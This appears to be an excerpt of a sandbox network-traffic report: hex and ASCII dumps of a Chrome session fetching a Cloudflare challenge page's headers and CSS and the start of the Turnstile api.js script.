                                                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                    content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                    cross-origin-embedder-policy: require-corp
                                                                    cross-origin-opener-policy: same-origin
                                                                    cross-origin-resource-policy: cross-origin
                                                                    origin-agent-cluster: ?1
                                                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                    critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                    referrer-policy: same-origin
                                                                    document-policy: js-profiling
                                                                    2024-12-19 16:51:19 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 38 65 35 38 61 66 39 35 38 34 33 66 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                    Data Ascii: Server: cloudflareCF-RAY: 8f48e58af95843fa-EWRalt-svc: h3=":443"; ma=86400
                                                                    2024-12-19 16:51:19 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                    Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                    Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                    Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                    Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                    Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                    Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                    Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                    Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.549735104.18.95.414431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:18 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:19 UTC471INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:18 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 47692
                                                                    Connection: close
                                                                    accept-ranges: bytes
                                                                    last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                    access-control-allow-origin: *
                                                                    cross-origin-resource-policy: cross-origin
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f48e58b8faf42c0-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                    Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                    Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                                    Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                    Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 4f 56 45 52 52 55 4e 4e 49 4e 47 3d 22 6f 76 65 72 72 75 6e 6e 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72
                                                                    Data Ascii: ING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.OVERRUNNING="overrunning",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){r
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 56 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70
                                                                    Data Ascii: el",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",V="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recap
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 3f 4d 72 28 7b 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3a 6c 2c 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 3a 67 2c 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 3a 63 7d 29 3a 63 26 26 67 3f 22 35 32 30 70 78 22 3a 63 26 26 6c 3f 22 35 30 30 70 78 22 3a 63 3f 22 34 38 30 70 78 22 3a 67 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4d 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f
                                                                    Data Ascii: existent");return o?Mr({isModeratelyVerbose:l,isVerboseLanguage:g,isSmallerFeedback:c}):c&&g?"520px":c&&l?"500px":c?"480px":g?"580px":"570px"},Mr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 7d 2c 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 75 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e
                                                                    Data Ascii: __||Object.getPrototypeOf(n)},ce(e)}function ur(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function qe(e){var r=typeof Map=="function"?new Map:void 0;return qe=function(o){if(o===null||!ur(o))return o;if(typeof o!="function")throw n
